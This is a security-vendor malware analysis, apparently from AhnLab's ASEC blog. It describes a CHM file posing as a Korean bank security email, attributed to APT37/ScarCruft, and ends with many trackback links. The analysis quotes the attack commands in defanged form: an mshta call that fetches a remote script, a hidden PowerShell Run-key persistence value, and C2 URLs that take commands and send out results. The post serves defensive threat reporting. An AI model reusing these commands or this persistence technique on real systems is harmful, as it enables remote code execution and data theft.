CHM Malware Disguised as Security Email from a Korean Financial Company: Redeyes (Scarcruft)

ASEC (AhnLab Security Emergency response Center) analysis team has discovered that the CHM malware, which is assumed to have been created by the RedEyes threat group (also known as APT37, ScarCruft), is being distributed to Korean users. The team has confirmed that the command used in the “2.3. Persistence” stage of the RedEyes group’s M2RAT malware attack, which was reported back in February, has the same format as the command used in this attack. This information, as well as the details of the CHM malware’s operation process, is described in the following post.

HWP Malware Using the Steganography Technique: RedEyes (ScarCruft)

When the CHM file is executed, it displays a Help screen disguised as a security email from a Korean financial company. The malicious script that exists within the CHM is activated during this process, making it difficult for users to notice. There has been a recent increase in malware distribution using CHM.

Help screen disguised as a security email

The malicious script that’s executed is shown below, and, like the other CHM malware introduced in the past, it also uses a shortcut object (ShortCut). The shortcut object is called through the Click method, and the command under the Item1 entry is executed. This file executes an additional script that exists within a certain URL through the mshta process.

  • Executed Command
    mshta.exe hxxp://shacc[.]kr/skin/product/1.html
Malicious script within CHM

The “1.html” file executed through the mshta process contains a JS (JavaScript) code. This code is responsible for executing the encoded PowerShell commands. The PowerShell command executed here has a similar format as the command used during the aforementioned M2RAT attack process.

1.html file code
Process tree

An examination of the decoded PowerShell command revealed that everything aside from the C2 address, the file name under which the command execution results are saved, and the registry value, has the same code as the command used back in February. This command is responsible for registering the RUN key to establish persistence, receiving commands from the threat actor’s server, and transmitting the command execution results.

  • RUN Key Registration
    Registry path: HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
    Value name: icxrNpVd
    Value: c:\windows\system32\cmd.exe /c PowerShell.exe -WindowStyle hidden -NoLogo -NonInteractive -ep bypass ping -n 1 -w 361881 2.2.2.2 || mshta hxxp://shacc[.]kr/skin/product/1.html
  • C2
    hxxp://shacc[.]kr/skin/product/mid.php?U=[Computer name]+[Username] // Receives threat actor’s commands
    hxxp://shacc[.]kr/skin/product/mid.php?R=[BASE64-encoded] // Transmits the command execution results
Decoded PowerShell command

When a system is infected with this type of malware, the system can suffer great damage since this malware is capable of performing various malicious acts such as downloading files and extorting information according to the threat actor’s commands. In particular, malware that targets specific users in Korea may include content on topics of interest to the user to encourage them to execute the malware, so users should refrain from opening emails from unknown sources and should not execute their attachments. Users should also regularly scan their PCs and update their security products to the latest engine.

[File Detection]
Trojan/CHM.Agent (2023.03.03.03)

[IOC]
8d2eebd10d90953cfada64575328ae24
806fad8aac92164f971c04bb4877c00f

Subscribe to AhnLab’s next-generation threat intelligence platform ‘AhnLab TIP’ to check related IOC and detailed analysis information.

5 1 vote
Article Rating
Subscribe
Notify of
guest

65 Comments
Inline Feedbacks
View all comments
trackback

[…] post CHM Malware Disguised as Security Email from a Korean Financial Company: Redeyes (Scarcruft) appeared first on ASEC […]

trackback

[…] CHM Malware Disguised as Security Email from a Korean Financial Company: Redeyes (Scarcruft) […]

trackback

[…] CHM Malware Disguised as Security Email from a Korean Financial Company: Redeyes (Scarcruft) […]

trackback

[…] to multiple reports from AhnLab Security Emergency response Center (ASEC), SEKOIA.IO, and Zscaler, the findings are illustrative of the group’s continuous […]

trackback

[…] to multiple reports from AhnLab Security Emergency response Center (ASEC), SEKOIA.IO, and Zscaler, the findings are illustrative of the group’s continuous […]

trackback

[…] to multiple reports from AhnLab Security Emergency response Center (ASEC), SEKOIA.IO, and Zscaler, the findings are illustrative of the group’s continuous […]

trackback

[…] to multiple reports from AhnLab Security Emergency response Center (ASEC), SEKOIA.IO, and Zscaler, the development is illustrative of the group’s continuous […]

trackback

[…] to multiple reports from AhnLab Security Emergency response Center (ASEC), SEKOIA.IO, and Zscaler, the development is illustrative of the group’s continuous […]

trackback

[…] line with a number of reviews from AhnLab Security Emergency response Center (ASEC), SEKOIA.IO, and Zscaler, the event is illustrative of the group’s steady efforts to […]

trackback

[…] to multiple reports from AhnLab Security Emergency response Center (ASEC), SEKOIA.IO, and Zscaler, the findings are illustrative of the group’s continuous […]

trackback

[…] to multiple reports from AhnLab Security Emergency response Center (ASEC), SEKOIA.IO, and Zscaler, the development is illustrative of the group’s continuous […]

trackback

[…] to multiple reports from AhnLab Security Emergency response Center (ASEC), SEKOIA.IO, and Zscaler, the findings are illustrative of the group’s continuous […]

trackback

[…] plusieurs rapports de Centre d’intervention d’urgence de sécurité AhnLab (UNE SECONDE), SEKOIA.IOet Échelle Zle développement illustre les efforts continus du groupe pour […]

trackback

[…] to multiple reports from AhnLab Security Emergency response Center (ASEC), SEKOIA.IO, and Zscaler, the development is illustrative of the group’s continuous […]

trackback

[…] to multiple reports from AhnLab Security Emergency response Center (ASEC), SEKOIA.IO, and Zscaler, the development is illustrative of the group’s continuous […]

trackback

[…] to multiple reports from AhnLab Security Emergency response Center (ASEC), SEKOIA.IO, and Zscaler, the development is illustrative of the group’s continuous […]

trackback

[…] to multiple reports from AhnLab Security Emergency response Center (ASEC), SEKOIA.IO, and Zscaler, the development is illustrative of the group’s continuous […]

trackback

[…] to multiple reports from AhnLab Security Emergency response Center (ASEC), SEKOIA.IO, and Zscaler, the development is illustrative of the group’s continuous […]

trackback

[…] to multiple reports from AhnLab Security Emergency response Center (ASEC), SEKOIA.IO, and Zscaler, the development is illustrative of the group’s continuous […]

trackback

[…] múltiples informes de Centro de respuesta a emergencias AhnLab Security (UN SEGUNDO), SEKOIA.IOy Escalador Zel desarrollo es ilustrativo de los esfuerzos continuos del […]

trackback

[…] to multiple reports from AhnLab Security Emergency response Center (ASEC), SEKOIA.IO, and Zscaler, the development is illustrative of the group’s continuous […]

trackback

[…] to multiple reports from AhnLab Security Emergency response Center (ASEC), SEKOIA.IO, and Zscaler, the development is illustrative of the group’s continuous […]

trackback

[…] to multiple reports from AhnLab Security Emergency response Center (ASEC), SEKOIA.IO, and Zscaler, the development is illustrative of the group’s continuous […]

trackback

[…] to multiple reports from AhnLab Security Emergency response Center (ASEC), SEKOIA.IO, and Zscaler, the development is illustrative of the group’s continuous […]

trackback

[…] to multiple reports from AhnLab Security Emergency response Center (ASEC), SEKOIA.IO, and Zscaler, the development is illustrative of the group’s continuous […]

trackback

[…] birden fazla rapora göre AhnLab Güvenlik Acil Müdahale Merkezi (BİR SANİYE), SEKOIA.IOVe Z ölçekleyicigelişme, grubun tespitten kaçınmak için taktiklerini […]

trackback

[…] to multiple reports from AhnLab Security Emergency response Center (ASEC), SEKOIA.IO, and Zscaler, the development is illustrative of the group’s continuous […]

trackback

[…] to multiple reports from AhnLab Security Emergency response Center (ASEC), SEKOIA.IO, and Zscaler, the development is illustrative of the group’s continuous […]

trackback

[…] to multiple reports from AhnLab Security Emergency response Center (ASEC), SEKOIA.IO, and Zscaler, the development is illustrative of the group’s continuous […]

trackback

[…] to multiple reports from AhnLab Security Emergency response Center (ASEC), SEKOIA.IO, and Zscaler, the development is illustrative of the group’s continuous […]

trackback

[…] to multiple reports from AhnLab Security Emergency response Center (ASEC), SEKOIA.IO, and Zscaler, the development is illustrative of the group’s continuous […]

trackback

[…] line with a number of reviews from AhnLab Security Emergency response Center (ASEC), SEKOIA.IO, and Zscaler, the event is illustrative of the group’s steady efforts to […]

trackback

[…] to multiple reports from AhnLab Security Emergency response Center (ASEC), SEKOIA.IO, and Zscaler, the development is illustrative of the group’s continuous […]

trackback

[…] to multiple reports from AhnLab Security Emergency response Center (ASEC), SEKOIA.IO, and Zscaler, the development is illustrative of the group’s continuous […]

trackback

[…] to multiple reports from AhnLab Security Emergency response Center (ASEC), SEKOIA.IO, and Zscaler, the development is illustrative of the group’s continuous efforts […]

trackback

[…] to multiple reports from AhnLab Security Emergency response Center (ASEC), SEKOIA.IO, and Zscaler, the development is illustrative of the group’s […]

trackback

[…] to multiple reports from AhnLab Security Emergency response Center (ASEC), SEKOIA.IO, and Zscaler, the development is illustrative of the group’s continuous […]

trackback

[…] to multiple reports from AhnLab Security Emergency response Center (ASEC), SEKOIA.IO, and Zscaler, the development is illustrative of the group’s continuous […]

trackback

[…] files to download additional malware onto targeted machines.According to multiple reports from AhnLab Security Emergency response Center (ASEC), SEKOIA.IO, and Zscaler, the development is illustrative of the group’s continuous […]

trackback

[…] to multiple reports from AhnLab Security Emergency response Center (ASEC), SEKOIA.IO, and Zscaler, the development is illustrative of the group’s continuous […]

trackback

[…] CHM Malware Disguised as Security Email from a Korean Financial Company: Redeyes (Scarcruft) (ASEC BLOG) ASEC (AhnLab Security Emergency response Center) analysis team has discovered that the CHM malware, which is assumed to have been created by the RedEyes threat group (also known as APT37, ScarCruft), is being distributed to Korean users. The team has confirmed that the command used in the “2.3. Persistence” stage of the RedEyes group’s M2RAT malware attack, which was reported back in February, has the same format as the command used in this attack. […]

trackback

[…] activity against South Korean targets. The AhnLab Security Emergency Response Center analysis team has observed activity from the APT37 threat group, conducting cyberespionage against individuals within South Korean […]

trackback

[…] to multiple reports from AhnLab Security Emergency response Center (ASEC), SEKOIA.IO, and Zscaler, the development is illustrative of the group’s continuous […]

trackback

[…] to multiple reports from AhnLab Security Emergency response Center (ASEC), SEKOIA.IO, and Zscaler, the development is illustrative of the group’s continuous […]

trackback

[…] (ASEC) confirmed that the RedEyes threat group (also known as APT37, ScarCruft), which distributed CHM Malware Disguised as Security Email from a Korean Financial Company last month, has also recently distributed the RokRAT malware through LNK […]

trackback

[…] (ASEC) confirmed that the RedEyes threat group (also known as APT37, ScarCruft), which distributed CHM Malware Disguised as Security Email from a Korean Financial Company last month, has also recently distributed the RokRAT malware through LNK […]

trackback

[…] assault chains have been adopted by a North Korean nation-state group often called ScarCruft in attacks aimed toward its southern counterpart to backdoor focused […]

trackback

[…] Similar attack chains have been adopted by a North Korean nation-state group known as ScarCruft in attacks aimed at its southern counterpart to backdoor targeted […]

trackback

[…] Similar attack chains have been adopted by a North Korean nation-state group known as ScarCruft in attacks aimed at its southern counterpart to backdoor targeted […]

trackback

[…] Similar attack chains have been adopted by a North Korean nation-state group known as ScarCruft in attacks aimed at its southern counterpart to backdoor targeted […]